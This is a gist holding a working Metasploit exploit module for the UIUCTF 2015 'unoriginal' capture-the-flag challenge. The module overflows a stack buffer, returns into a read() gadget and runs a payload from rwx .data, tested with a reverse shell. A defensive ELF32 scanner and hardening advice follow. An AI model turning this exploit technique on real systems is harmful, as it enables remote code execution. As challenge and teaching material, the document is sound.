@jgor
Last active March 22, 2018 03:53

UIUCTF 2015 - pwn - unoriginal
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  def initialize
    super(
      'Name'        => 'uiuctf unoriginal',
      'Description' => %q{
        This module exploits the UIUCTF 2015 pwn - unoriginal challenge.
      },
      'Author'      => 'jgor',
      'Arch'        => ARCH_X86,
      'Platform'    => 'linux',
      'License'     => MSF_LICENSE,
      'Targets'     =>
        [
          [ 'Automatic', {} ],
        ]
    )

    register_options(
      [
        Opt::RPORT(1235)
      ],
      self.class
    )
  end

  def exploit
    dest        = 0x08049748 # start of .data
    read_gadget = 0x0804843f # read() call within func()
    fd          = 0
    read_count  = payload.encoded.length + 5

    connect

    buf = ''
    # overflow buffer
    buf << "\x41" * 13
    # set up frame pointer
    buf << [dest - 4].pack('L')
    # overwrite RET -> jump to existing read() call
    buf << [read_gadget].pack('L')
    # set up args to read()
    buf << [fd].pack('N')          # file descriptor 0
    buf << [dest].pack('L')        # start of .data (mem range is rwx)
    buf << [read_count].pack('N')  # count to read
    sock.put(buf)

    buf = ''
    # return to payload 4 bytes ahead
    buf << [dest + 4].pack('L')
    # msf payload (tested with linux/x86/shell/reverse_tcp)
    buf << payload.encoded
    sock.put(buf)
  end
end
```
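The module only works because the target maps `.data` readable, writable and executable, so bytes read into it can be jumped to. On 32-bit Linux the usual cause is a binary with a missing or executable `PT_GNU_STACK` header: the kernel then turns on `READ_IMPLIES_EXEC` and every readable mapping becomes executable, even if the file's own `PT_LOAD` flags say `rw-`. The scanner below is an added example, not part of jgor's gist or of Metasploit; it parses the ELF32 program headers of a binary and reports exactly those two conditions. The function names (`elf32_program_headers`, `check_memory_protections`, `build_sample_elf32`) and the sample ELF bytes it builds are my own constructions for the demo.

```ruby
# Added example (not from the gist): scan an ELF32 binary's program headers
# for the memory-protection weaknesses a "read payload into .data and jump
# to it" exploit needs. Pure Ruby, no gems, little-endian ELF32 only.

PT_LOAD      = 1
PT_GNU_STACK = 0x6474e551
PF_X = 1
PF_W = 2
PF_R = 4

# Returns an array of { type:, vaddr:, memsz:, flags: } for each program header.
def elf32_program_headers(data)
  raise ArgumentError, 'not an ELF file' unless data.byteslice(0, 4) == "\x7fELF"
  # EI_CLASS (offset 4) == 1 -> ELF32, EI_DATA (offset 5) == 1 -> little-endian
  unless data.getbyte(4) == 1 && data.getbyte(5) == 1
    raise ArgumentError, 'only little-endian ELF32 is handled here'
  end
  phoff = data.byteslice(28, 4).unpack('V')[0]            # e_phoff
  phentsize, phnum = data.byteslice(42, 4).unpack('vv')   # e_phentsize, e_phnum
  Array.new(phnum) do |i|
    off = phoff + i * phentsize
    # Elf32_Phdr: p_type p_offset p_vaddr p_paddr p_filesz p_memsz p_flags (p_align ignored)
    p_type, _off, p_vaddr, _paddr, _filesz, p_memsz, p_flags = data.byteslice(off, 28).unpack('V7')
    { type: p_type, vaddr: p_vaddr, memsz: p_memsz, flags: p_flags }
  end
end

def flags_to_s(flags)
  ((flags & PF_R).zero? ? '-' : 'r') +
    ((flags & PF_W).zero? ? '-' : 'w') +
    ((flags & PF_X).zero? ? '-' : 'x')
end

# Returns an array of human-readable findings; empty means neither weakness was seen.
def check_memory_protections(data)
  findings = []
  phdrs = elf32_program_headers(data)

  # 1. A PT_LOAD segment that is both writable and executable in the file itself.
  phdrs.each do |ph|
    next unless ph[:type] == PT_LOAD
    next if (ph[:flags] & PF_W).zero? || (ph[:flags] & PF_X).zero?
    findings << format('PT_LOAD at 0x%08x (%s, %d bytes) is writable and executable',
                       ph[:vaddr], flags_to_s(ph[:flags]), ph[:memsz])
  end

  # 2. Stack executability, which on 32-bit Linux also makes every readable
  #    mapping (including .data) executable via READ_IMPLIES_EXEC.
  stack = phdrs.find { |ph| ph[:type] == PT_GNU_STACK }
  if stack.nil?
    findings << 'no PT_GNU_STACK header: loader defaults to an executable stack (READ_IMPLIES_EXEC on i386)'
  elsif (stack[:flags] & PF_X) != 0
    findings << 'PT_GNU_STACK is executable (no NX): every readable mapping becomes executable on i386'
  end
  findings
end

# Constructed sample: a 52-byte ELF32 header followed by program headers at e_phoff = 52.
# data_flags sets the .data PT_LOAD flags; stack_flags nil omits PT_GNU_STACK entirely.
def build_sample_elf32(data_flags, stack_flags)
  phdrs = [
    [PT_LOAD, 0x0000, 0x08048000, 0x08048000, 0x1000, 0x1000, PF_R | PF_X],  # text
    [PT_LOAD, 0x1000, 0x08049000, 0x08049000, 0x0800, 0x0800, data_flags],   # data
  ]
  phdrs << [PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags] unless stack_flags.nil?
  ident  = "\x7fELF".b + [1, 1, 1, 0].pack('C4') + ("\x00" * 8).b
  header = ident + [2, 3, 1, 0x08048000, 52, 0, 0, 52, 32, phdrs.size, 0, 0, 0].pack('vvVVVVVvvvvvv')
  header + phdrs.map { |ph| (ph + [0x1000]).pack('V8') }.join
end

if $PROGRAM_NAME == __FILE__
  blob = ARGV[0] ? File.binread(ARGV[0]) : build_sample_elf32(PF_R | PF_W | PF_X, PF_R | PF_W | PF_X)
  findings = check_memory_protections(blob)
  puts(findings.empty? ? 'no W+X segments, PT_GNU_STACK present and non-executable' : findings)
end
```

Run it with a path to an ELF32 binary to see its findings, or with no argument to scan the constructed sample, which deliberately has an `rwx` data segment and an executable stack. A `readelf -lW` on the real challenge binary shows the same headers the script reads; the fix on the build side is linking with `-z noexecstack` (and not marking any `PT_LOAD` segment `W+X`).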